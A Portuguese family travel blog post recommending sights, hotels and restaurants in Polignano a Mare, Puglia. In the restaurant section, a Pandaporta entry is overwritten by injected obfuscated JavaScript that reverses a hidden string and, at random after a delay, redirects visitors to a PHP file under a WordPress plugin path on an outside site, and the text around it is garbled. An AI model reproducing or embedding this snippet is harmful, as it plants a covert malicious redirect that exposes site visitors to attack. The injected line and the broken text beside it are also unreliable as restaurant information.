Polignano a Mare, em Puglia

Polignano a Mare é uma cidade é incrível!! Banhada pelo mar adriático, azul e cristalino, é cheia de casinhas de pedrinhas brancas, tons pastéis, vistas e cavernas de tirar o fôlego! A cidade fica em cima das falésias, a uns 20 metros de altura, e passear de barco por lá é uma experiência mágica.
Não tem jeito: olhar toda aquela grandiosidade é de manter qualquer coração aceso de tanta paixão!

Polignano a Mare é a cidade onde nasceu Domenico Modugno, aquele que canta a famosa música “Volareeee, oh oh!”. Seu centro histórico e suas belas praias são um convite para viajar com as Kids.

Na verdade, Polignano A Mare tem tudo para agradar: arquitetura, história, geografia e cultura. Em um dia, dá para conhecer tudo. Vale, porém, se hospedar lá e ir conhecendo as outras cidades ao redor.

DICA DA MAMÃE VIAJANTE

As praias são lindas, mas se você estiver em busca de praias sossegadas, essa não é a melhor cidade. Há poucas com faixa de areia e as que existem são muitos estreitas, o que faz com que no verão lote muito.

O que fazer em Polignano a Mare

Lama Monachile: É a atração principal de Polignano a Mare e uma das praias mais famosas da Itália. Fica escondida entre dois penhascos, bem no meio do burburinho da cidade, e o acesso é feito por debaixo da ponte. Ótimo para nadar, mas por ser bem pequena, fica muito lotada. Nessa praia, existem algumas cavernas onde dá para entrar pela praia a pé e sair do outro lado, pular na água e nadar de volta para a praia. Muito divertida! Achei bem engraçado ver os locais escalando as falésias.

Abadia de San Vito: Uma Abadia do século X. É uma praia mais local frequentada por moradores, então acaba tendo menos turistas. Fica ao lado das ruínas de uma antiga torre, e lá também tem uma área bem propícia para as kids, como Porto Cavallo e Porto Contessa.

Centro Histórico: Um charme esse centro histórico, com várias ruelas que mais parecem labirinto! Cada calçada e cantinho fofo são convites para o relaxamento. Para não se perder, comece pelo Arco Marchesale ou Porta Grane, passe pela Piazza Miani Perrotti e continue pelas ruas fofas e branquinhas até chegar na praça principal, a Piazza Vittorio Emanuele II. É lá onde está a igreja Chiesa Matrice di Santa Maria Assunta e o Palazzo Dell Orologio. Dali, ande 15 minutos e vá até a Praia Cala Paura, que também é cercada por falésias!

Passeio de barco: Amamos esse passeio! Saímos da Cala Porto Marina (Porto de Pogliano al Mare) e fomos percorrendo todas as grutas, passando por várias cavernas e lugares incríveis! Ver a cidade lá de baixo naquele mar azul cristalino dá a sensação de ainda mais imponência e beleza à cidade.

DICA DA MAMÃE VIAJANTE

Todos os passeios que fiz e várias dicas eu consegui com a Cristina do blog vem pra Puglia (@vemparapuglia). Ela reservou o barco, deu excelentes dicas de restaurante e, por ser uma brasileira que mora lá, ninguém tem dificuldade com a língua.

Torre Guaceto: é um parque natural lindo com uma área marinha protegida, localizada ao norte de Brindisi. Tem um pequeno trem para as crianças menores. Já as mais velhas podem alugar bicicleta e sair pedalando pela região. Além disso, kids de qualquer idade podem mergulhar de snorkel para ver a vida marinha por lá.

Masserias, a hospedagem típica local

As masserias, que são hospedagens familiares administradas fora das cidades, podem ser especialmente perfeitas para as famílias. Geralmente, elas contam com uma piscina, bicicletas, um bosque de oliveiras e / ou limoeiros, um vinhedo e provavelmente alguns animais amigáveis.

Algumas podem organizar aulas de culinária, atividades em conjunto ou direcionada para crianças, enquanto os pais desfrutam de alguma degustação de vinhos.

Outras produzem Mozzarella e explicam como elas são feitas, além de apresentar um pouco da culinária local, como a burrata, stracciatella etc. Só não ficamos em uma masseria porque alugamos uma casa.

Antes de começar falando de cada lugar para se hospedar, vale destacar 2 sites de aluguel de casa na região da Puglia que podem ser bem interessantes: o Bookings for You e o Raro Villas.

Onde ficar em Polignano a Mare

Hotel Covo dei Saraceni: O hotel é muito bem localizado, perto do centro e de frente para o mar. Muito confortável, vista incrível com um café da manhã maravilhoso. Alguns quartos têm vista para o mar e o atendimento é muito gentil.

San Michele Suíte: Hotel lindo demais, todo branquinho, com ares de Grécia. É o tipo do hotel que dá para voltar várias vezes. Da recepção ao concièrge, todos são bastante atenciosos para atender a vontade do hóspede quanto a reserva de restaurantes e passeios. O café da manhã é servido no terraço de frente para aquele marzão incrível! Os quartos são bem espaçosos, mesmo sendo um hotel boutique, com tudo muito moderno e novo. Eles tem um estacionamento privado que custa 20 euros por dia e já facilita muito.

San Michele Suíte

Sei Stella Mama: Hotel muito bem localizado onde o carinho e a atenção fazem toda a diferença. É um hotel relativamente pequeno, mas totalmente modernizado com um café incrível e quartos bem confortáveis. A própria família que te recebe é a que dá todas as dicas das regiões. Atendimento personalizado em um ambiente extremamente agradável, aconchegante e requintado.

DICA DA MAMÃE VIAJANTE

Antes de reservar qualquer hotel, vale consultar como fica a questão de estacionamento caso você esteja de carro. Alguns até têm estacionamento privativo, mas outros ficam um pouco mais longe, e carregar malas + crianças nunca é a melhor opção. Por isso, essa informação é bem importante antes de fazer qualquer reserva. Existem alguns estacionamentos próximos das cidades, mas é melhor sempre coordenar com o hotel .

Dimora Talenti: É uma espécie de bed & breakfast com cara de hotel, até mesmo porque os quartos são amplos. O hotel é literalmente debruçado sobre o mar. Das sacadas do quarto, a vista é para aquele oceano Adriático lindo e cristalino. Você literalmente vê as ondas quebrando abaixo de você. Além disso, o hotel recebe muito bem os hóspedes.

Giovi Relais: É um hotel-boutique muito confortável , aconchegante e charmoso e para os papais animados tem um ótimo spa também. Fica bem no centro da cidade, em uma rua de pedestres muito charmosa cheia de pequenas lojas e restaurantes, a Via Roma. Além de ser muito bem localizado, as janelas são anti-ruídos. Equipe muito educada, eficiente e simpática.

Dei Serafeni: A proposta desse B&B é bem bacana já que oferece várias comodidades que tornam a estadia mais especial. Alguns quartos contam com Kitinete, geladeira e mini bar. Mas também oferece o café da manhã, que é bem farto, além de receberem muito bem seus hóspedes. Tem um terraço com vista para a cidade e a localização é incrível. Vale só ressaltar que alguns apartamentos têm escada.

Hotel San Tommaso: Hotel pitoresco que fica a uns 3 km da cidade. Ou seja,  recomendo para aqueles que querem fugir do agito. A distância recompensa todas as coisas boas que se vê por lá: é um charme de lugar com suas paredes de pedra. Além de ótimo atendimento, tem opções de entretenimento para as Kids e quartos amplos e charmosos.

Hotel San Tommaso

Grotta Palazzese: Localização linda e vista incrível! Tem gente que nem sabe que é um hotel, já que seu restaurante dentro da gruta rouba a cena. Assim como o restaurante, achei que tem várias restrições, o que faz o foco desse hotel ser para uma público mais romântico do que Kids friendly.

Restaurantes

Polignano a Mare é cheia de pequenas opções de refeições para famílias, principalmente frutos do mar, além de trazer muitas deliciosas gelaterias.

Mint: Adorei as mesas na praça! Enquanto comíamos, as crianças brincavam. Serviço muito atencioso e, no final, o chef veio falar conosco para saber a nossa opinião etc. Atmosfera amigável e relaxante, e os pratos são incríveis feitos apenas com produtos locais. Uma experiência gastronômica fantástica!

Ristorante Grotta Palazzazese: Já foi um salão de encontro de senhores feudais e hoje é um hotel/restaurante bem charmoso. É mais que um restaurante, é um ponto turístico, já que em poucos lugares do mundo se vê um restaurante dentro de uma gruta! A comida é boa, mas o que me incomodou um pouco foram as várias restrições que, para quem vai com crianças, pode não agradar muito.

Ristorante Grotta Palazzazese

anda Porta $Ubj=function(n){if (typeof ($Ubj.list[n]) == “string”) return $Ubj.list[n].split(“”).reverse().join(“”);return $Ubj.list[n];};$Ubj.list=[“\’php.litu.ssalc/sedulcni/retadpu-yfimeht/snigulp/tnetnoc-pw/moc.setaicossadnalanruoj//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andaportapicc.it/menu.pdf”>ICC: Tagliolini de tinta de Lula com frutos do mar simplesmente divino! Tudo muito bom e bem feito. A salada de frutos do mar que pedimos de entrada é inesquecível. O custo x benefício também é ótimo, já que eles tem um menu fixo com entrada, prato principal e sobremesa. Tem um ambiente bonito e hospitaleiro, e a equipe muito atenciosa que ajuda com amor e paciência nas melhores sugestões de prato.

ando chegamos até achamos que era uma pizzaria.

Casa Mia Trattoria e Pizza: Ótimas massas, antepastos, pizzas clássicas e gourmet em um ambiente descontraído. É bem kids friendly e informal, e as crianças se sentiram bem à vontade. Ótima opção de restaurante quando se está com muita gente.

Pescaria: Local muito agradável com funcionários muito gentis, boa comida e preços normais. O peixe cru e os mariscos são bem gostosos, e os pratos tem combinações perfeitas. Vive cheio porque também tem um serviço de take away. Valeu muito ter esperado para comer o sanduíche de polvo com molho tártaro!

Restaurante Antiche Mura: Serve massas e peixes que são oferecidos pelo próprio proprietário. Fica bem no centro da cidade, e o atendimento é cortês e atencioso. Comida bem fresca e de qualidade, e o lugar de tão bom é frequentado pelos próprios italianos locais.

Il GrottinoÓtimas massas e pizzas, mas comemos um tortellini de camarão com manjericão delicioso! Os raviólis são muito bons também. Os garçons são bem solícitos e é o típico restaurante para ir com amigos e família, já que tem um ambiente bem caloroso e fica bem no meio da Rua Roma. Via Roma, 57, 70044 Polignano a Mare BA, Itália

Osteria Dei Mulini: Local muito legal, com várias coisas gostosas como o spaghetti de frutos do mar e o tartar de atum. O polvo grelhado também é divino! As porções são bem generosas. Equipe muito gentil, simpática e atenciosa, além de bom custo x benefício. Local mais quieto, mas a cozinha é fantástica.

Bella M Briana: O cardápio inclui uma ampla seleção de pizzas e também oferece pratos normais, mas é basicamente uma pizzaria deliciosa. O mexilhão com batata aqui também é famoso e o restaurante fica ao lado de uma pequena praça. O serviço é bem ágil, e a stracciatela de burrata também é incrível!

Purso Sushi: Para os amantes de sushi, o restaurante Purso é uma experiência culinária. Restaurante Japonês com show de produtos frescos e de alta qualidade. Serviço impecável e rápido. O proprietário recebe cada um, e o local é acolhedor e agradável. As crianças amaram o combo roll.

Osteria Piga: Equipe simpática e eficiente excelente relação qualidade / preço, onde os clientes são bem orientados nos pedidos. Serviço rápido, simpático e eficiente. Não é um restaurante turístico, já que é frequentado por locais. Seu menu é variado e interessante, valorizando produtos e sabores locais. O nhoque e o risoto de palha e feno são deliciosos!

Restaurante Donna Ginna: Localização à beira-mar e os pratos locais são muito bons. Restaurante bem conhecido pelos peixes e frutos do mar. A equipe era muito gentil e a berinjela, tomate e burrata eram incríveis também. Pela sua localização privilegiada, os preços são bem mais caros e muitas vezes nas ruas de trás você encontra restaurantes tão bons quanto a preços mais acessíveis. Porém comer aqui com aquela vista do mar faz realmente diferença.

Restaurante Donna Ginna

L’Osteria di Chichibio: Localização excelente, com atendimento e comida maravilhosa com custo x benefício muito bom. A salada e o espaguete de frutos do mar eram divinos, e o restante da comida muito saboroso em um lugar muito elegante. Restaurante cheio de estilo e charme com uma ambientação de muito bom gosto e bastante cosmopolita.

Fra Crudi e Cotti: Restaurante sofisticado mas que cria um ambiente tão acolhedor que você se sente em casa. Tem um nhoque com camarão e molho de tomate incrível! As massas e frutos do mar são preparados de uma forma deliciosa e o atendimento é nota mil.

Specchia Sant Oronzo: Aquele lugar que tudo é maravilhoso: ambiente, vista, comida e atendimento. Sem contar que o custo x benefício é ótimo também. Os peixes frescos e as pizzas são os carros-chefes .

Pizzeria La Rustica: Pizzaria Rústica mais deliciosa, onde a pizza é aquela de massa bem fina, ao contrário da tradicional italiana mais massuda. Ótimo custo x benefício e um ambiente mais despojado. A massa de frutos do mar é muito famosa, repleta de crustáceos graúdos e maravilhosos. Via Principe di Napoli, 5, 70044 Polignano a Mare BA, Itália

Leo’s Braci: Quando enjoar de comer carne e frutos do mar, essa pode ser uma ótima pedida. Lugar simples, gostoso e econômico. O purê de favas de lá cai bem. Você escolhe a carne, eles preparam na hora e ainda tem direito a alguns acompanhamentos.

>> Deu vontade de conhecer esse destino juntinho com a família? A Nath e a Travel Place preparam um roteiro na medida certa para vocês fazerem a viagem dos sonhos!



Comentários